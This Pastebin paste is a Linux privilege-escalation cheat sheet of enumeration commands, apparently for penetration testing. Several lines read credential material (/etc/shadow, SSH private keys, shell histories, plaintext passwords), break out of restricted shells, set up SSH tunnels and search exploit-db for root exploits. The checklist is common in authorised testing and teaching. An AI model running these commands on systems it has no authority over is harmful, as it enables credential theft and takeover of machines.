ToKeiChun

Linux Privilege Escalation Techniques

Mar 10th, 2022
62
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.91 KB | None | 0 0
  1. // Determine linux distribution and version
  2. cat /etc/issue
  3. cat /etc/*-release
  4. cat /etc/lsb-release
  5. cat /etc/redhat-release
  6.  
  7. // Determine kernel version - 32 or 64-bit?
  8. cat /proc/version
  9. uname -a
  10. uname -mrs
  11. rpm -q kernel
  12. dmesg | grep Linux
  13. ls /boot | grep vmlinuz-
  14.  
  15. // List environment variables
  16. cat /etc/profile
  17. cat /etc/bashrc
  18. cat ~/.bash_profile
  19. cat ~/.bashrc
  20. cat ~/.bash_logout
  21. env
  22.  
  23. // Determine if there is a printer
  24. lpstat -a
  25.  
  26. // Determine which services are running
  27. ps aux
  28. ps -ef
  29. top
  30. cat /etc/service
  31.  
  32. // Determine which services are running as root
  33. ps aux | grep root
  34. ps -ef | grep root
  35.  
  36. // Determine installed applications
  37. ls -alh /usr/bin/
  38. ls -alh /sbin/
  39. dpkg -l
  40. rpm -qa
  41. ls -alh /var/cache/apt/archivesO
  42. ls -alh /var/cache/yum/
  43.  
  44. // Syslog Configuration
  45. cat /etc/syslog.conf
  46. cat /var/log/syslog.conf
  47. (or just: locate syslog.conf)
  48.  
  49. // Web Server Configurations
  50. cat /etc/chttp.conf
  51. cat /etc/lighttpd.conf
  52. cat /etc/apache2/apache2.conf
  53. cat /etc/httpd/conf/httpd.conf
  54. cat /opt/lampp/etc/httpd.conf
  55.  
  56. // PHP Configuration
  57. /etc/php5/apache2/php.ini
  58.  
  59. // Printer (cupsd) Configuration
  60. cat /etc/cups/cupsd.conf
  61.  
  62. // MySql
  63. cat /etc/my.conf
  64.  
  65. // Inetd Configuration
  66. cat /etc/inetd.conf
  67.  
  68. // List All
  69. ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
  70.  
  71. // Determine scheduled jobs
  72. crontab -l
  73. ls -alh /var/spool/cron
  74. ls -al /etc/ | grep cron
  75. ls -al /etc/cron*
  76. cat /etc/cron*
  77. cat /etc/at.allow
  78. cat /etc/at.deny
  79. cat /etc/cron.allow
  80. cat /etc/cron.deny
  81. cat /etc/crontab
  82. cat /etc/anacrontab
  83. cat /var/spool/cron/crontabs/root
  84.  
  85. // Locate any plaintext usernames and passwords
  86. grep -i user [filename]
  87. grep -i pass [filename]
  88. grep -C 5 "password" [filename]
  89. find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
  90.  
  91. // Identify connected NICs and other networks
  92. /sbin/ifconfig -a
  93. cat /etc/network/interfaces
  94. cat /etc/sysconfig/network
  95.  
  96. // Identify connected users and hosts
  97. lsof -i
  98. lsof -i :80
  99. grep 80 /etc/services
  100. netstat -antup
  101. netstat -antpx
  102. netstat -tulpn
  103. chkconfig --list
  104. chkconfig --list | grep 3:on
  105. last
  106. w
  107.  
  108. // Identify cached IP or MAC addresses
  109. arp -a
  110. route
  111. /sbin/route -nee
  112.  
  113. // Identify network configuration Settings (DHCP, DNS, Gateway)
  114. cat /etc/resolv.conf
  115. cat /etc/sysconfig/network
  116. cat /etc/networks
  117. iptables -L
  118. hostname
  119. dnsdomainname
  120.  
  121. // Is packet sniffing possible
  122. # tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
  123. tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21
  124.  
  125. // Check for ports open for local only connections
  126. netstat -tupan
  127.  
  128. // Is tunnelling possible?
  129. ssh -D 127.0.0.1:9050 -N [username]@[ip]
  130. proxychains ifconfig
  131.  
  132. // Identify the current user and users in the system
  133. id
  134. who
  135. w
  136. last
  137. cat /etc/passwd | cut -d : -f 1 # List users
  138. grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
  139. awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
  140.  
  141. // List Sudoers
  142. cat /etc/sudoers
  143.  
  144. // Show which commands sudo allows you to run
  145. sudo -l
  146.  
  147. // Attempt to display sensitive files
  148. cat /etc/passwd
  149. cat /etc/group
  150. cat /etc/shadow
  151. ls -alh /var/mail/
  152.  
  153. // Check for anything interesting in home directories
  154. ls -ahlR /root/
  155. ls -ahlR /home/
  156.  
  157. // Are there any hardcoded passwords in scripts, databases or configuration files
  158. cat /var/apache2/config.inc
  159. cat /var/lib/mysql/mysql/user.MYD
  160. cat /root/anaconda-ks.cfg
  161.  
  162. // Check user history for credentials and activity
  163. cat ~/.bash_history
  164. cat ~/.nano_history
  165. cat ~/.atftp_history
  166. cat ~/.mysql_history
  167. cat ~/.php_history
  168.  
  169. // Check user profile and mail
  170. cat ~/.bashrc
  171. cat ~/.profile
  172. cat /var/mail/root
  173. cat /var/spool/mail/root
  174.  
  175. // Check for accessible private keys
  176. cat ~/.ssh/authorized_keys
  177. cat ~/.ssh/identity.pub
  178. cat ~/.ssh/identity
  179. cat ~/.ssh/id_rsa.pub
  180. cat ~/.ssh/id_rsa
  181. cat ~/.ssh/id_dsa.pub
  182. cat ~/.ssh/id_dsa
  183. cat /etc/ssh/ssh_config
  184. cat /etc/ssh/sshd_config
  185. cat /etc/ssh/ssh_host_dsa_key.pub
  186. cat /etc/ssh/ssh_host_dsa_key
  187. cat /etc/ssh/ssh_host_rsa_key.pub
  188. cat /etc/ssh/ssh_host_rsa_key
  189. cat /etc/ssh/ssh_host_key.pub
  190. cat /etc/ssh/ssh_host_key
  191.  
  192. // Find writeable configuration files in /etc
  193. ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
  194. ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
  195. ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
  196. ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
  197.  
  198. find /etc/ -readable -type f 2>/dev/null # Anyone
  199. find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
  200.  
  201. // Examine /var structure (logs, configuration files
  202. ls -alh /var/log
  203. ls -alh /var/mail
  204. ls -alh /var/spool
  205. ls -alh /var/spool/lpd
  206. ls -alh /var/lib/pgsql
  207. ls -alh /var/lib/mysql
  208. cat /var/lib/dhcp3/dhclient.leases
  209.  
  210. // Any hidden files / settings on a hosted website
  211. ls -alhR /var/www/
  212. ls -alhR /srv/www/htdocs/
  213. ls -alhR /usr/local/www/apache22/data/
  214. ls -alhR /opt/lampp/htdocs/
  215. ls -alhR /var/www/html/
  216.  
  217. // Check Local Log Files
  218. # http://www.thegeekstuff.com/2011/08/linux-var-log-files/
  219. cat /etc/httpd/logs/access_log
  220. cat /etc/httpd/logs/access.log
  221. cat /etc/httpd/logs/error_log
  222. cat /etc/httpd/logs/error.log
  223. cat /var/log/apache2/access_log
  224. cat /var/log/apache2/access.log
  225. cat /var/log/apache2/error_log
  226. cat /var/log/apache2/error.log
  227. cat /var/log/apache/access_log
  228. cat /var/log/apache/access.log
  229. cat /var/log/auth.log
  230. cat /var/log/chttp.log
  231. cat /var/log/cups/error_log
  232. cat /var/log/dpkg.log
  233. cat /var/log/faillog
  234. cat /var/log/httpd/access_log
  235. cat /var/log/httpd/access.log
  236. cat /var/log/httpd/error_log
  237. cat /var/log/httpd/error.log
  238. cat /var/log/lastlog
  239. cat /var/log/lighttpd/access.log
  240. cat /var/log/lighttpd/error.log
  241. cat /var/log/lighttpd/lighttpd.access.log
  242. cat /var/log/lighttpd/lighttpd.error.log
  243. cat /var/log/messages
  244. cat /var/log/secure
  245. cat /var/log/syslog
  246. cat /var/log/wtmp
  247. cat /var/log/xferlog
  248. cat /var/log/yum.log
  249. cat /var/run/utmp
  250. cat /var/webmin/miniserv.log
  251. cat /var/www/logs/access_log
  252. cat /var/www/logs/access.log
  253. ls -alh /var/lib/dhcp3/
  254. ls -alh /var/log/postgresql/
  255. ls -alh /var/log/proftpd/
  256. ls -alh /var/log/samba/
  257. # auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
  258.  
  259. // Is it possible to break out of "jail" shell
  260. python -c 'import pty;pty.spawn("/bin/bash")'
  261. echo os.system('/bin/bash')
  262. /bin/sh -i
  263. vi -> :sh or :!UNIX_command
  264.  
  265. // Check which filesystems are mounted
  266. mount
  267. df -h
  268.  
  269. // Check if there are unmounted filesystems
  270. cat /etc/fstab
  271.  
  272. // Finding world writeable directories
  273. find / -perm 777
  274.  
  275. // Find setuid files
  276. find / -perm +4000 -type f
  277.  
  278. // Find root setuid files
  279. find / -perm +4000 -uid 0 -type f
  280.  
  281. // Additional File System Checks? Sticky bits, SUID & GUID
  282. find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
  283. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
  284. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
  285.  
  286. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
  287. for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
  288.  
  289. # find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
  290. find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
  291.  
  292. // Check common directories for write and execute permissions
  293. find / -writable -type d 2>/dev/null # world-writeable folders
  294. find / -perm -222 -type d 2>/dev/null # world-writeable folders
  295. find / -perm -o+w -type d 2>/dev/null # world-writeable folders
  296. find / -perm -o+x -type d 2>/dev/null # world-executable folders
  297. find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders
  298.  
  299. // Check for problem files (World Writeable / "Nobody" files)
  300. find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files
  301. find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files
  302.  
  303.  
  304. ##### Attacking Vulnerable Kernel and SUID Applications #####
  305.  
  306. // Finding Exploit Code
  307. /pentest/exploits/exploitdb/searchsploit "kernel" |grep -i "root"
  308. cat /pentest/exploits/exploitdb/files.csv |grep -i privile
  309. grep -i X.X /pentest/exploits/exploitdb/files.csv |grep -i local
  310. grep -i application /pentest/exploits/exploitdb/files.csv |grep -i local
  311.  
  312. // Check Development Environment on Target Hosts
  313. find / -name perl*
  314. find / -name python*
  315. find / -name gcc*
  316. find / -name cc
  317.  
  318. // How can files be uploaded?
  319. find / -name wget
  320. find / -name nc*
  321. find / -name netcat*
  322. find / -name tftp*
  323. find / -name ftp
  324. # If port 22 is open, use srvdir for SSH egress
  325.  
  326. # Also use unix-privesc-check from pentestmonkey
Add Comment
Please, Sign In to add comment